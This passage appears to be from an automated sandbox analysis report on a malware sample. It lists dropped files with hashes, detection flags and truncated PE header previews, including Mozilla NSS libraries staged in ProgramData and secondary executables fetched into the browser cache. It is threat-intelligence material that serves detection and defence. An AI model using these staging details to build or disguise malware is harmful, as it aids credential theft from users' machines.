                                                                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zseJg77aI9/ArXWpW8VYjYm8M4J0L1FX+q8vyL3dKGIfnDd:uIjfUI75Arm7VjJ0zKyxKLfnDd
                                                                                                                                                                                                                                                                                        MD5:C92DC37AFE9ED50DBC7B49F1F3364BE0
                                                                                                                                                                                                                                                                                        SHA1:9DC67E4D329CFD40D2BEAF15BB89C658BFA0027C
                                                                                                                                                                                                                                                                                        SHA-256:6E1D1B9D5BD7966D52793789C5E8DBCC504F4F81961A584A4C0CBD7F82B64B81
                                                                                                                                                                                                                                                                                        SHA-512:C68EE9C739558C3704F79C38615A8AF7EBE9F76DCF2AEECFF145594D0F6615FCA45CE2B05FE4CEAB5669072BA168A0BF00A6A8D77847B6F6285F1FC21641A311
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583600" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                                                        C:\ProgramData\freebl3.dll

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):685392
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                        MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):608080
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):450024
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\ProgramData\nss3.dll

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):2046288
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\ProgramData\softokn3.dll

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):257872
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                                        MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):80880
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                        MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\c2bb02869b.exe.log

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exe
                                                                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):226
                                                                                                                                                                                                                                                                                        Entropy (8bit):5.360398796477698
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                                                                                                                                                                                                                                        MD5:3A8957C6382192B71471BD14359D0B12
                                                                                                                                                                                                                                                                                        SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                                                                                                                                                                                                                                        SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                                                                                                                                                                                                                                        SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):3135488
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.646511400069138
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:49152:tbHBc8XMZ9OolllcgGfZ1P12Dh38zEpvnub+KYxeGpIH3/PCM:trSi49O+lyXfZX2Dh38IpG6KYxeGqX/a
                                                                                                                                                                                                                                                                                        MD5:FAD8A273ED15C30E16C4BA0C776A9727
                                                                                                                                                                                                                                                                                        SHA1:EEDF4978CB6CFB020C1F0CC552C2AD2CF238C72C
                                                                                                                                                                                                                                                                                        SHA-256:E38CB6ED4B58F8B2F61D3CA1F11385DBCC184B948C88ADA6B68C0763A2EF31C9
                                                                                                                                                                                                                                                                                        SHA-512:6C6F034C5B2541999BE44D6C85EDC0BABFEF513300EF223238691CD9C0F66F035DB41016429DB7DF67FC9E2A1FAE0BE9AFD8BCF3CEBDB5FE2F5FC308497013E4
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............/...........@...........................0.....r./...@.................................T...h.......@........................................................................................................... . ............................@....rsrc...@...........................@....idata ............................@...htwuwyzf. *.......*.................@...dhfttsvz....../......./.............@....taggant.0..../.."..../.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):685392
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                        MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):608080
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):450024
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):2046288
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\pidgeon[1].exe

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):17547264
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.5040419038866615
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:98304:B07UyxIHbmjUDWr0OyJEMYbqVGevIZm2nM7vK0Mr5xUEvnDG8yf569uidQI:Q9IHS0Wr0OqUqbAZm2H0a5x9vnD0Uu
                                                                                                                                                                                                                                                                                        MD5:27DA32557EF397101BD519D5A3E00180
                                                                                                                                                                                                                                                                                        SHA1:35338A9C8E6410DC2E9B90A11A15FA2EBC6AD861
                                                                                                                                                                                                                                                                                        SHA-256:56C566348B994A79C0B6FADECB435141830C938469FC607F98C8AAE838711F69
                                                                                                                                                                                                                                                                                        SHA-512:A38448584807B7E137F4F467F3188EC4B6C02BE497643B2F45F02908EF0E9CF2F6B84A543ACC7354B8FF0F37EADFB47345D55866C9F93C1F089F80062A5BC6FA
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d.....1g.........."..........e..............@..............................0.......................@............... ...........................S........E.....8e..............-.............................(...................................................text............................. ..`.data............................@....bss.....................................idata...S.......T..................@....didata............................@....edata...............|..............@..@.tls.....................................rdata..m...........~..............@..@.reloc...-.........................@..B.pdata..8e.......f..................@..@.rsrc.....E.......E.................@..@.............0......................@..@

                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):2823680
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.504495616485594
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:49152:LkI+zHJAjhJNh3KPc/uIGsN0orLDYvlsbRq:LkIiJA1JNh3KP1dsqorXyH
                                                                                                                                                                                                                                                                                        MD5:247F995931CCF613FE7C4DF0FC6DBAF0
                                                                                                                                                                                                                                                                                        SHA1:0060B3E40596BB0031A983195094BDFC57E554A6
                                                                                                                                                                                                                                                                                        SHA-256:3040D190FDEA818DBEEFA014B634077003EA442164E4FEBAD82D6CF00D34BBD7
                                                                                                                                                                                                                                                                                        SHA-512:B9266DDF78A39B7E244E8410F3EE743BC7B1AA98F237B7660C6B63FB670F3712120265FD2AF4B21BB5519DDEB6421ACCA0E42F6CE4B57F06D7A9AFA838894D47
                                                                                                                                                                                                                                                                                        Malicious:true
